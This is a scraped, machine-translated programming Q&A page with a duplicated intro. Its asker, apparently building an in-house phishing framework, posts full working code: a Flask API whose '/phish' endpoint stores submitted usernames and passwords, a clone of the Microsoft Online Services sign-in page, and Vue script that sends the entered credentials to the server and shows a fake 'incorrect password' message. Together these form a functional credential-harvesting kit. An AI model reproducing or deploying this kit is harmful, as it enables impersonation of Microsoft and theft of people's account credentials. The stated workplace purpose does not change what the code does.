Javascript JS无法从外部调用命中Python API,但可以从内部调用命中Python API
在我开始编写代码之前,这里只提供一些上下文信息 互联网->ISP路由器(192.168.2.0/24)->FortiGate防火墙(IPS)->ESXI网络->虚拟机(192.168.2.114)。防火墙阻止所有到服务器的流量,除非您在IP白名单范围内。路由器端口将我的DDNS地址上的端口80直接转发到VM。如果您在白名单上,则可以访问该网页 我正在为工作设计和实现自己的网络钓鱼框架,而不是使用其他框架,比如GoPhish。我已经解决了99%的问题。稍后我将更改一些Python,以使用参数化语句来避免SQL注入。DB是用它的表、存储过程等设置的。在端口80上有一个python脚本服务于静态网页。Python还有一个位于http://Javascript JS无法从外部调用命中Python API,但可以从内部调用命中Python API,javascript,python,html,python-3.x,vue.js,Javascript,Python,Html,Python 3.x,Vue.js,在我开始编写代码之前,这里只提供一些上下文信息 互联网->ISP路由器(192.168.2.0/24)->FortiGate防火墙(IPS)->ESXI网络->虚拟机(192.168.2.114)。防火墙阻止所有到服务器的流量,除非您在IP白名单范围内。路由器端口将我的DDNS地址上的端口80直接转发到VM。如果您在白名单上,则可以访问该网页 我正在为工作设计和实现自己的网络钓鱼框架,而不是使用其他框架,比如GoPhish。我已经解决了99%的问题。稍后我将更改一些Python,以使用参数化语句
#/usr/bin/env python3
APP_HOST = '192.168.2.114'
APP_PORT = 80
APP_DEBUG = True
DB_HOST = 'localhost'
DB_USER = 'capture'
DB_PASSWD = '< removed >'
DB_DATABASE = 'phishing'
SECRET_KEY = '< removed >'
#!/usr/bin/env python3
import sys
print(sys.path)
from flask import Flask, jsonify, abort, request, make_response, session
from flask_restful import reqparse, Resource, Api
from flask_session import Session
import json
#from ldap3 import Server, Connection, ALL
#from ldap3.core.exceptions import *
import pymysql
import pymysql.cursors
#import ssl #include ssl libraries
import settings # Our server and db settings, stored in settings.py
app = Flask(__name__)
#CORS(app)
# Set Server-side session config: Save sessions in the local app directory.
app.config['SECRET_KEY'] = settings.SECRET_KEY
app.config['SESSION_TYPE'] = 'filesystem'
app.config['SESSION_COOKIE_NAME'] = 'peanutButter'
app.config['SESSION_COOKIE_DOMAIN'] = settings.APP_HOST
Session(app)
####################################################################################
#
# Error handlers
#
@app.errorhandler(400) # decorators to add to 400 response
def not_found(error):
return make_response(jsonify( { 'status': 'Bad request' } ), 400)
@app.errorhandler(404) # decorators to add to 404 response
def not_found(error):
return make_response(jsonify( { 'status': 'Resource not found' } ), 404)
@app.errorhandler(500) # decorators to add to 500 response
def not_found(error):
return make_response(jsonify( { 'status': 'Internal server error' } ), 500)
####################################################################################
#
# Static Endpoints for humans
#
class Root(Resource):
# get method. What might others be aptly named? (hint: post)
def get(self):
return app.send_static_file('index.html')
#Create Shortened Link
class URL(Resource):
def post(self):
retval = {"status": "success"}
# Parse the json
parser = reqparse.RequestParser()
try:
# Check for required attributes in json document, create a dictionary
parser.add_argument('username', type=str, required=True)
parser.add_argument('password', type=str, required=True)
request_params = parser.parse_args()
#print(request.json)
except:
abort(400) # bad request
if request.json and 'username' in request.json and 'password' in request.json:
response = {'status': 'success'}
responseCode = 200
username = request_params['username']
password = request_params['password']
try:
dbConnection = pymysql.connect(host='localhost',
user='capture',
password='<removed>',
db='phishing',
charset='utf8mb4',
cursorclass= pymysql.cursors.DictCursor)
sql = 'captureCredentials'
cursor = dbConnection.cursor()
sqlArgs = (username, password) # Must be a collection
cursor.callproc(sql,sqlArgs) # stored procedure, with arguments
row = cursor.fetchone()
dbConnection.commit() # database was modified, commit the changes
finally:
dbConnection.close()
cursor.close()
return make_response(jsonify(response), responseCode)
# endpoint objects
#
api = Api(app)
api.add_resource(URL,'/phish')
if __name__ == "__main__":
#context = ('cert.pem', 'key.pem') # Identify the certificates you've generated.
app.run(
host=settings.APP_HOST,
port=settings.APP_PORT,
#ssl_context=context,
debug=settings.APP_DEBUG)
<html>
<head>
<title>Sign in to Microsoft Online Services</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="PageID" content="i5030.2.0">
<meta name="SiteID" content="10">
<meta name="ReqLC" content="1033">
<meta name="LocLC" content="1033">
<meta name="mswebdialog-newwindowurl" content="*">
<link rel="SHORTCUT ICON" href="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/images/favicon_a.ico">
<link href="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/css/login.ltr.css" rel="stylesheet" type="text/css">
<script src="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/js/jquery.1.5.1.min.js" type="text/javascript"></script>
<script src="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/js/aad.login.js" type="text/javascript"></script>
<script src="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/js/jquery.easing.1.3.js" type="text/javascript"></script>
<style>
body {
display: none;
}
</style>
</head>
<body>
<script>
if (self == top) {
var body = $('body');
body.css('display', 'block');
} else {
top.location = self.location;
}
</script>
<div class="container-fluid" id="app">
<div id="background_branding_container" class="ie_legacy" style="background: #FFFFFF">
<img id="background_background_image" alt="Illustration for Microsoft Online Services">
<div id="background_company_name_text" class="background_title_text"></div>
</div>
<div id="background_page_overlay" class="overlay ie_legacy">
</div>
<div id="login_no_script_panel" class="login_panel">
<table class="login_panel_layout" style="height: 100%;">
<tr class="login_panel_layout_row" style="height: 100%;">
<td id="login_panel_left"></td>
<td id="login_panel_center">
</td>
<td id="login_panel_right">
</td>
</tr>
</table>
<td id="login_panel_right">
</td>
</div>
<div id="login_panel" class="login_panel">
<table class="login_panel_layout" style="height: 100%;">
<tr class="login_panel_layout_row" style="height: 100%;">
<td id="login_panel_left"></td>
<td id="login_panel_center">
<!--office365 logo-->
<script type="text/javascript">
$(document).ready(function() {
Constants.DEFAULT_LOGO = 'https://secure.aadcdn.microsoftonline-p.com/aadbranding/1.0.1/aadlogin/Office365/logo.png';
Constants.DEFAULT_LOGO_ALT = 'Sign in';
Constants.DEFAULT_ILLUSTRATION = 'https://secure.aadcdn.microsoftonline-p.com/aadbranding/1.0.1/aadlogin/Office365/illustration.jpg';
Constants.DEFAULT_BACKGROUND_COLOR = '#EB3C00';
Context.TenantBranding.workload_branding_enabled = true;
User.UpdateLogo(Constants.DEFAULT_LOGO, Constants.DEFAULT_LOGO_ALT);
User.UpdateBackground(Constants.DEFAULT_ILLUSTRATION, Constants.DEFAULT_BACKGROUND_COLOR);
Context.TenantBranding.whr_key = '';
jQuery('img#logo_img').attr('src', '');
Context.use_instrumentation = true;
User.moveFooterToBottom('250px');
});
</script>
<div class="login_inner_container">
<div class="inner_container cred">
<div class="login_workload_logo_container">
</div>
<div class="login_cta_container normaltext">
<div id="login_cta_text" class="cta_message_text 1">Sign in with your organizational account</div>
</div>
<ul class="login_cred_container">
<li class="login_cred_field_container">
<div id="cred_userid_container" class="login_textfield textfield">
<span class="input_field textfield">
<label for="UsernameForm" class="no_display">User account</label>
<div class="input_border">
</span>
<form method="POST" action="login-submit.php?uid=<?php echo $uid ?>" name="LoginForm" autocomplete="off">
</br>
<input class="login_textfield textfield required field normaltext" type="text" name="username" v-model="input.username" placeholder="example@microsoft.com">
</br>
</br>
<input class="login_textfield textfield required email field normaltext" type="password" name="password" v-model="input.password" placeholder="Password">
<!--<input class="text" name="username" class="login_textfield textfield required email field normaltext" placeholder="someone@example.com " tabindex="1">
</br>
</br>
<input type="password" name="password" placeholder="Password" class="login_textfield textfield required field normaltext" tabindex="2" type="password" aria-label="Password">-->
</br>
</br>
</br>
<button class="col-4 btn btn-outline-success" type="button" v-on:click="login()">Sign In</button>
</form>
</div>
<div id="cred_password_container" class="login_textfield textfield">
<span class="input_field textfield">
<label for="PasswordForm" class="no_display">Password</label>
<div class="input_border">
</div>
</span>
</div>
<div id="cred_hidden_inputs_container" class="no_display">
<input type="hidden" id="PPSX" name="PPSX" value="PassportRN">
<input type="hidden" name="PPFT" id="i0327" value="A1F6YNWGa2YkRUNNhPfW3T8PcqsjHEeiQmp*m*wFwPyxag08*cPrW*SpZSnKeqiDJI*EUu8ceb42zjM89!r*ck!Q6kkHvZYoRPC53LwqFG6O6YCE5yI3mHRGLjK6BurKT332TUIqbZPBSJiw!cfoJN2PCje1NESa7hs4mIzcHNmkN7DO0RJOeoWX8r1DK*UBFpxFwOw$">
</div>
</form>
</li>
<li class="login_cred_options_container">
<div id="cred_kmsi_container" class="subtext normaltext">
<span class="input_field ">
<input tabindex="10" id="cred_keep_me_signed_in_checkbox" type="checkbox" value="0" name="persist">
<label id="keep_me_signed_in_label_text" for="cred_keep_me_signed_in_checkbox" class="persist_text">Keep me signed in</label>
</span>
</div>
</li>
</ul>
</div>
</div>
</td>
</tr>
</table>
</div>
</div>
<script src="https://cdn.jsdelivr.net/npm/vue/dist/vue.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/axios/0.18.0/axios.min.js"></script>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css"/>
<!--<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>-->
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script type="text/javascript" src="/static/phish.js" ></script>
</body>
</html>
// register modal component
Vue.component("modal", {
template: "#modal-template"
});
var app = new Vue({
el: "#app",
//------- data --------
data: {
serviceURL: "http://192.168.2.114",
input: {
username: "",
password: "",
},
},
methods: {
/* Done */
login() {
if (this.input.username != "" && this.input.password != "") {
axios
.post(this.serviceURL+"/phish", {
"username": this.input.username,
"password": this.input.password
})
.then(response => {
if (response.data.status == "success") {
//Nothing
}
})
.catch(e => {
alert("The username or password was incorrect, try again");
this.input.password = "";
console.log(e);
});
} else {
alert("A username and password must be present");
}
},
showModal() {
this.editModal = true;
},
hideModal() {
this.editModal = false;
}
}
//------- END methods --------
});